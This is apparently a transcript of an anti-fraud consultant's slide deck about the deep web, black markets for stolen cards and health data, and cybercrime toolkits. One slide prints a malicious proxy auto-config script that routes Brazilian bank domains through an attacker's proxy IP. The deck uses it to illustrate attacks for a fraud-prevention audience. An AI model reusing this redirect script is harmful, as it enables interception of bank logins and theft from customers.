The Deep Web - What's Lurking in the Deep End of the Internet

32
What’s lurking in the deep end of the Internet? The Deep Web Joshua Schleicher Anti-Fraud Solutions Consultant [email protected]

Transcript of The Deep Web - What's Lurking in the Deep End of the Internet

Page 1: The Deep Web - What's Lurking in the Deep End of the Internet

What’s lurking in the deep end of the Internet?

The Deep Web

Joshua Schleicher

Anti-Fraud Solutions Consultant

[email protected]

Page 2: The Deep Web - What's Lurking in the Deep End of the Internet

95% of the ocean remains unexplored, unseen by human eyes

http://oceanservice.noaa.gov/facts/exploration.html

Page 3: The Deep Web - What's Lurking in the Deep End of the Internet

Just like an iceberg, the majority of the Deep Web remains obscured from view

Page 4: The Deep Web - What's Lurking in the Deep End of the Internet

Google has only indexed 200TB of the Internet's data...an estimated .004% of the total Internet

Source: https://hewilson.wordpress.com/what-is-the-deep-web/statistics/

Page 5: The Deep Web - What's Lurking in the Deep End of the Internet

Source: http://money.cnn.com/infographic/technology/what-is-the-deep-web/

These search engines capture < 1% of all web content

Page 6: The Deep Web - What's Lurking in the Deep End of the Internet

Source: http://money.cnn.com/infographic/technology/what-is-the-deep-web/

The Deep Web

Page 7: The Deep Web - What's Lurking in the Deep End of the Internet

The Deep Web is truly anonymous– you can’t even get on it unless you yourself are anonymous

Page 8: The Deep Web - What's Lurking in the Deep End of the Internet

Users can buy virtually anything from drugs to credit card information and accounts

Page 9: The Deep Web - What's Lurking in the Deep End of the Internet

Public interest about the

Deep Web is at an all-time

high with sites receiving

50% more monthly traffic

than surface sites

Source: http://www.sickchirpse.com/deep-web-guide/2/

Page 10: The Deep Web - What's Lurking in the Deep End of the Internet

The recent evolution of the Deep Web has allowed fraud to become increasingly commoditized, simply because there are many ways to monetize the fraud process itself.

Page 11: The Deep Web - What's Lurking in the Deep End of the Internet

The Process

Information Theft

Black Market Sale

Page 12: The Deep Web - What's Lurking in the Deep End of the Internet
Page 13: The Deep Web - What's Lurking in the Deep End of the Internet

Cybercrime Platforms

> Data Stealer SDK

> VOLK

> Webshells

> Zeus

> SpyEye

> Citadel

> ICE IX

> BlackHole Exploit Kit

> iBanking (Mobile Botnet)

> Malware Targeting POS

Page 14: The Deep Web - What's Lurking in the Deep End of the Internet

Mobile Crimeware Platforms are being used to harvest credentials to infiltrate accounts.

Page 15: The Deep Web - What's Lurking in the Deep End of the Internet

PAC (Proxy Autoconfiguration) Attacks

function FindProxyForURL(url, host){// ---- Santander if (shExpMatch(host, "www.santander.com.br")) {

return "PROXY 201.20.46.177:80";

} if (shExpMatch(host, "santander.com.br")) {

return "PROXY 201.20.46.177:80";

} if (shExpMatch(host, "www.banespa.com.br")) {

return "PROXY 201.20.46.177:80";

} if (shExpMatch(host, "banespa.com.br")) {

return "PROXY 201.20.46.177:80";

}}

Page 16: The Deep Web - What's Lurking in the Deep End of the Internet

Fraudsters have succeeded at breaching big-name merchants

Page 17: The Deep Web - What's Lurking in the Deep End of the Internet

The Process

Information Theft

Black Market Sale

Page 18: The Deep Web - What's Lurking in the Deep End of the Internet

Easy Checkout

.

Customer Support

.

Money Back Gurantee

Technical Support

Shopping Online with the Deep Web

Page 19: The Deep Web - What's Lurking in the Deep End of the Internet

The Hidden WikiResource for finding hacking databases and credit card sale sites

Page 20: The Deep Web - What's Lurking in the Deep End of the Internet

Online Card Shops

Page 21: The Deep Web - What's Lurking in the Deep End of the Internet

Factors affecting Price:• Validity Rate• Supply and Demand• Issuing Region

How much is a card worth?

Source: http://krebsonsecurity.com/2014/02/fire-sale-on-cards-stolen-in-target-breach/

Page 22: The Deep Web - What's Lurking in the Deep End of the Internet

How much is Healthcare data worth?

In 2015 – The cost of just one Medicare number, $470

Source: http://www.npr.org/sections/alltechconsidered/2015/02/13/385901377/the-black-market-for-stolen-health-care-data

Page 23: The Deep Web - What's Lurking in the Deep End of the Internet

Cashing In

Image Source: http://www.tripwire.com/state-of-security/vulnerability-management/how-stolen-target-credit-cards-are-used-on-the-black-market/

Page 24: The Deep Web - What's Lurking in the Deep End of the Internet

Silk RoadThe most famous online drug market that was shut down in 2013 by the FBI

Page 25: The Deep Web - What's Lurking in the Deep End of the Internet

Down the Rabbit Hole, The Front Door

Page 26: The Deep Web - What's Lurking in the Deep End of the Internet

Welcome to the Jungle

Page 27: The Deep Web - What's Lurking in the Deep End of the Internet

Welcome to the Jungle

Page 28: The Deep Web - What's Lurking in the Deep End of the Internet

Welcome to the Jungle

Page 29: The Deep Web - What's Lurking in the Deep End of the Internet

Welcome to the Jungle

IRS & the Federal Office of Personnel Management recently fell victim to breaching and Deep Web information trading.

Page 30: The Deep Web - What's Lurking in the Deep End of the Internet

Welcome to the Jungle

Page 31: The Deep Web - What's Lurking in the Deep End of the Internet

My Two Cents• Tackle the problem from beginning to end• Look for constant innovation• Speed and flexibility are critical when fighting back fraud• Ask for references – especially when something bad hap-

pens• There is no silver bullet

Page 32: The Deep Web - What's Lurking in the Deep End of the Internet

Questions?

Joshua Schleicher

Anti-Fraud Solutions Consultant

[email protected]